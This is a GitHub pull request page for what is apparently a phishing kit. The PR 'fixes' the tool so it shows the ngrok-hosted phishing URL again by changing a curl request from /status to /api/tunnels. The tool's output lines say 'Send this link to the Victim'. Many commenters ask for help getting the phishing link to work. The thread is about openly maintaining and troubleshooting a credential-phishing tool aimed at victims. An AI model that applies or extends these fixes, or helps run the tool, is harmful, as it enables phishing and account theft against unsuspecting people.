Skip to content

Comments

Fixed "missing link" error#2

Open
CyberXCodder wants to merge 1 commit into8L4NK:masterfrom
CyberXCodder:master
Open

Fixed "missing link" error#2
CyberXCodder wants to merge 1 commit into8L4NK:masterfrom
CyberXCodder:master

Conversation

@CyberXCodder
Copy link

@CyberXCodder CyberXCodder commented Apr 29, 2021

The previous version has an error which doesn't show the phishing URL:

image

The reason for this is because ngrok html page has a different code than expected by curl, as seen in line 436:

link=$(curl -s -N http://127.0.0.1:4040/status | grep -o "https://[0-9a-z]*\.ngrok.io")

When grep tries looking for the link, it can't be found in /status, thought it can be found in /api/tunnels as a plain text.
The fix was to change from /status to /api/tunnels, it should work properly now as shown below:

image

The previous version has an error which doesn't show the phishing URL. The reason for this was the Ngrok html page, which was built using purely javascript. Fixed it by changing the requests path from "/status" to "/api/tunnels". The code should show the phishing URL properly now.
@saroj-dev
Copy link

nice bro thanks for the help i had the same problem

@BlackLord1
Copy link

Hi.Can u help me to fix the error wich doesn't show the phishing URL?

@Believer2244
Copy link

Believer2244 commented May 18, 2021 via email

@Kuzenkkk
Copy link

Hi mate, can you explain me one thing, please? Why isn't it working while VPN is activated?

@frossokk
Copy link

hi i have a question how to edit this code and change it?

@Bepo128
Copy link

Bepo128 commented Nov 4, 2022

the error is still there...

Copy link

@DocEmerald-dev DocEmerald-dev left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

for me its still not working

[] Choose an option: 1
[
] Downloading Ngrok...
[] Starting php server...
[
] Starting ngrok server...
[] Send this link to the Victim:
[
] Waiting victim open the link ...

@jacquezjones
Copy link

how do I update the code for it to show the link

@ADart12
Copy link

ADart12 commented Feb 15, 2025

still there is problem, it is not showing the URL if any one know please help me.

@llxst
Copy link

llxst commented Feb 15, 2025

bro pls fix this error

@llxst
Copy link

llxst commented Feb 15, 2025

@CyberXCodder

@Ahmad-Rana2
Copy link

Link Which it make cannot Work Any solution

@ShivoloMC
Copy link

anyone to pleaase help me here,
image
Screenshot 2025-03-20 103231

@ShivoloMC
Copy link

what is the username and password, it keeps prompting me for the username and password

@spandhare11
Copy link

still url issue don't solve .

@shotym3sa
Copy link

so has anyone figured out how to get the link

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.